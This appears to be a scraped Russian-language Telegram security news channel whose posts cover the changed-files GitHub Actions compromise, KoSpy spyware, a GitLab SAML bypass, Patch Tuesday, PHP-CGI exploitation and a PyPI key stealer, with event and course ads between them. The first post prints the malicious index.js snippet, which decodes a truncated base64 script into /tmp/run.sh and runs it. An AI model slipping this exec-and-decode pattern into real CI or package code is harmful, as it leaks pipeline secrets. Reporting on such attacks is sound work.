Белый хакер Cyber Security🧑🏻‍💻

🔔Взлом репозитория changed-files: украденные ключи через GitHub Actions Привет, очередной день, очередной supply chain атака. На этот раз пострадал проект changed-files, который используется в GitHub Actions для отслеживания изменений файлов в 23 тысячах репозиториев. Вредоносный коммит добавил в код обработчика слежку за ключами доступа, которые затем утекали через публичные логи сборки. 👨‍💻 Зловред спрятался в коммите 0e58ed8, где index.js «обновили» для работы с файловыми блокировками. Но на деле в коде появилась вот такая конструкция:

    
        async function updateFeatures(token) {
    const {stdout, stderr} = await exec.getExecOutput('bash', ['-c', 
    `echo "aWYgW1sgIiRPU1...ApmaQo=" | base64 -d > /tmp/run.sh && bash /tmp/run.sh`], {
        ignoreReturnCode: true,
        silent: true
    });
    core.info(stdout);
}{}
    

Внутри этой base64-закодированной строки оказался скрипт, который: ⏺ Проверяет, что он выполняется на Linux ⏺ Скачивает и запускает memdump.py, который вытягивает секретные данные из памяти ⏺ Кодирует их двойным base64 и печатает в лог

⚙️ Причём GitHub распознал этот коммит как отправленный ботом renovate[bot], но он был неверифицированным и явно шёл из форка. Скорее всего, атакующий использовал манипуляции с тегами, перенося их на новую версию кода, а потом откатывал ветку main, чтобы скрыть следы. P. S Снова атака через GitHub Actions. Уже можно вводить правило: если твой CI/CD-сервис умеет работать с переменными окружения — рано или поздно их кто-то скомпрометирует. #GitHubActions #Инфобез 👍 Белый хакер

Специалисты по ИБ уже переглянусь👀 Потому что увидели анонс вебинара по безопасности информационной инфраструктуры организации. ⏰ 20 марта в 11:00 (МСК) расскажем о том, как сделать процесс категорирования быстрым и прозрачным, а также о возможностях инвентаризации и комплаенс-проверок. Кроме того, продемонстрируем, как работает система НОТА КУПОЛ.Документы — единое рабочее пространство для учета сведений о субъектах КИИ и объектов ОКИИ. 🗣 Спикер: руководитель пресейл продуктов НОТА КУПОЛ Саида Еркова. 📤 Регистрируйтесь и обязательно дождитесь подтверждения участия на указанный электронный адрес. До встречи в эфире 😎 Реклама ООО «ГК «Иннотех»» ИНН: 9703073496. Erid: 2SDnje9iPkg

📱 Северокорейские хакеры снова в деле: шпионское ПО в Google Play Привет, андроид-пользователи, держите карманы шире — исследователи Lookout обнаружили, что северокорейские хакеры под видом безобидных приложений протащили в Google Play шпионский софт KoSpy. Вредоносное ПО успели скачать более 10 раз, и, судя по всему, оно было нацелено на конкретных жертв.

👨‍💻 KoSpy умеет многое: считывать СМС, звонки, местоположение, собирать данные о Wi-Fi-сетях, делать снимки экрана, записывать звук и даже фотографировать через камеры устройства. Для работы оно использовало инфраструктуру Google Cloud и базу данных Filestore. Google, конечно, удалил заражённые приложения и отключил Firebase-проекты, но факт остаётся фактом — вредоносы уже были в магазине.

🔔 Более того, Lookout нашла похожие шпионские программы и в стороннем магазине APKPure, но представители площадки заявили, что их никто не предупреждал. Также KoSpy использовал IP и домены, связанные с северокорейскими APT-группами APT37 и APT43. P. S А вот на кого была направлена атака? По всей видимости, на жителей Южной Кореи, так как приложения имели названия на корейском и поддерживали английский язык. #Кибербезопасность #GooglePlay 👍 Белый хакер

🔐 Обход SAML-аутентификации в GitLab Всем привет! GitLab спешно выкатила патчи 17.9.2, 17.8.5 и 17.7.7, исправляющие критическую уязвимость CVE-2025-25291 и CVE-2025-25292, которая позволяла обходить аутентификацию на базе SAML. Причина? Ошибка в библиотеке ruby-saml, используемой не только в GitLab, но и во многих других проектах.

⚙️ Корень проблемы — разное поведение XML-парсеров REXML и Nokogiri, из-за чего при разборе одного и того же SAML-документа формировались структуры с разными цифровыми подписями. В итоге атакующий мог провернуть XSW (XML Signature Wrapping) и заставить систему принять поддельный ответ на аутентификацию. Главное условие — доступ к любому подписанному SAML-документу.

🟢 Интересно, что уязвимость всплыла во время баг-баунти от GitHub: ребята тестировали переход на ruby-saml и предложили хакерам поломать тестовый стенд. Один из участников нашел баг, а GitHub докопалась до еще одной уязвимости на той же основе. Позже подтвердилось, что в GitLab эта дыра позволяет входить под чужими аккаунтами. P. S Патч уже вышел, но если у вас SAML-аутентификация, стоит обновиться срочно. А то мало ли кто уже проверил эту уязвимость на практике. #GitLab #Уязвимости 👍 Белый хакер

🖌 Microsoft снова латает дыры: 57 уязвимостей в мартовском обновлении Привет, новый «вторник патчей» от Microsoft принес нам 57 исправленных уязвимостей, из которых семь — 0-day, а шесть уже эксплуатировались хакерами. И, как обычно, среди них есть несколько критических багов, которые могут превратить твой Windows-сервер в филиал хакерской лаборатории.

👨‍💻 Особенно интересны уязвимости с удаленным выполнением кода (RCE), такие как CVE-2025-24985 и CVE-2025-24993. Обе связаны с обработкой файловых систем Windows NTFS и Fast FAT и позволяют злоумышленникам исполнять произвольный код. Самый популярный вектор атаки — вредоносные VHD-образы, которые можно подкинуть через фишинг или «пиратский» софт.

🔔 Также среди исправленных багов есть обход защиты в Microsoft Management Console (CVE-2025-26633), проблемы с повышением привилегий в ядре Windows и RCE в Microsoft Access (CVE-2025-26630), эксплуатируемый через carefully crafted файлы. P. S Если ты все еще не обновился, самое время. Особенно если работаешь с RDS, DNS Server или WSL — там тоже нашлось несколько сюрпризов. #Microsoft #Уязвимости 👍 Белый хакер

Хочешь стать Linux-экспертом? LinuxCamp - канал системного разработчика, который поможет тебе освоить Linux и программирование на профессиональном уровне! - Уникальные гайды по администрированию Linux - Продвинутые техники и рекомендации по разработке на языках C/C++ - Подробные статьи о внутреннем устройстве операционных систем - Интересные факты и новости из мира технологий 🌐 Присоединяйся к нам и становись частью сообщества истинных гуру: LinuxCamp

🛡 PHP-CGI под атакой Привет, если у тебя где-то еще крутится PHP на Windows с CGI, сейчас самое время паниковать и закрывать дыру. Уязвимость CVE-2024-4577 (9.8 CVSS) уже вовсю эксплуатируют хакеры, а первые атаки начались еще в январе.

👨‍💻 Изначально уязвимость позволяет удаленно исполнять код на сервере, причем особенно легко она срабатывает на локализациях типа китайского и японского. Хотя изначально атаковали в основном японские организации, сейчас GreyNoise фиксирует атаки по всему миру, особенно в США, Германии, Китае и Сингапуре. Всего с января было замечено 1089 уникальных IP, пытающихся эксплуатировать баг.

👤 Хакеры не просто крадут данные, а повышают привилегии, разворачивают Cobalt Strike и другие инструменты, превращая сервер в полноценный плацдарм. В сети уже доступно 79 разных эксплоитов — так что если у тебя еще не стоит патч, лучше сделай это прямо сейчас. P. S Если ты думал, что уязвимость, закрытая в июне 2024, уже никому не интересна, подумай еще раз. Время от закрытия бага до его активной эксплуатации становится все короче. #PHP #Уязвимости 👍 Белый хакер

Киберкриминалист расследует цифровые преступления, ищет цифровые следы, восстанавливает данные и раскрывает кибератаки, делая виртуальный мир безопаснее 🔍 Освойте цифровую криминалистику на курсе от Академии Кодебай! 😎 Стартуем 17 марта. Регистрация здесь. Что будет на курсе? 🌟 Решение задач, основанных на APT-отчетах 🌟 Работа с opensource инструментами на протяжении полного цикла реагирования на инциденты 🌟 Поиск и анализ артефактов, оставленных хакерами и их вредоносным ПО Для кого создан этот курс? 🔸 для аналитиков 1, 2 и 3 линий SOC 🔸 для для начинающих DFIR и Red Team специалистов 🔸 для организаций — повысить квалификацию сотрудников в сфере реагирования на КИ и форензики ОС семейства UNIX 🚀 По всем вопросам пишите @Codeby_Academy

🔔 Set-utils: вор крипты прямо из PyPI Привет, всем! Очередной день, очередной вредонос в PyPI. На этот раз исследователи из Socket Security нашли пакет set-utils, который специализировался на краже приватных ключей Ethereum. Вредонос подменял стандартные функции библиотеки eth-account, а потом незаметно уводил ключи прямо в блокчейн Polygon.

👨‍💻 Разработчик ставит пакет (он же выглядит как utils, ну кто там будет проверять), использует его для генерации кошелька, а приватный ключ в этот момент уже утекает в сеть. В set-utils был встроен публичный ключ RSA злоумышленника, так что приватник сразу шифровался и отправлялся в транзакции через Polygon RPC. Удобно? Конечно. Вся инфа надежно хранится в блокчейне, её не заблокируют фаерволы или антивирусы, да и комиссии там копеечные.

🔴 На момент обнаружения set-utils загрузили 1077 раз. Вроде бы немного, но если среди этих загрузок были DeFi-проекты или Web3-приложения — то пострадавших может быть гораздо больше. Сейчас пакет удалён. P. S Ну а если ты разрабатываешь что-то с криптой, пора завести привычку чекать зависимости до установки, а не после. Иначе однажды кошелек сам собой «обнулится». #PyPI #Безопасность 👍 Белый хакер

ИБ без фильтров. Честный диалог и полезный опыт Участвуйте в первой онлайн-конференции для тех, кто решает реальные задачи в ИБ Что вы получите: — кейсы по вовлечению сотрудников в культуру ИБ, — инструменты поиска, найма и развития ИБ-специалистов, — методы планирования и бюджетирования ИБ-инициатив. — чек-листы по правовому регулированию ИБ-инициатив в компании и по соответствию законодательным требованиям. Для кого: Онлайн-конференция будет полезна специалистам по ИБ, руководителям ИБ-отделов, IT-менеджерам, HR-специалистам и владельцам бизнеса. Обсудим, как: — вовлечь в инфобез рядовых сотрудников компании, — правильно считать и закладывать деньги на ИБ-инициативы, — сочетать многообразие ИБ-решений, — обезопасить бизнес по юридическим нормативам, — сделать так, чтобы ИБ-инициативы не мешали, а помогали бизнесу. Когда: 26 марта в 11.00 (МСК) Кто будет: — Харитон Никишкин, генеральный директор Secure-T — Максим Горшенин, блогер, эксперт по импортозамещению в IT — Ольга Попова, ведущий юрист Staffcop — Даниил Бориславский, заместитель генерального директора по развитию продукта Staffcop ❗️ Чтобы узнавать новости о событии, а также зарегистрироваться на него, подписывайтесь на Telegram Staffcop. Реклама. ООО «АТОМ БЕЗОПАСНОСТЬ», ИНН 5408298569 , ОГРН 1125476195459 erid:2SDnjdSMpYt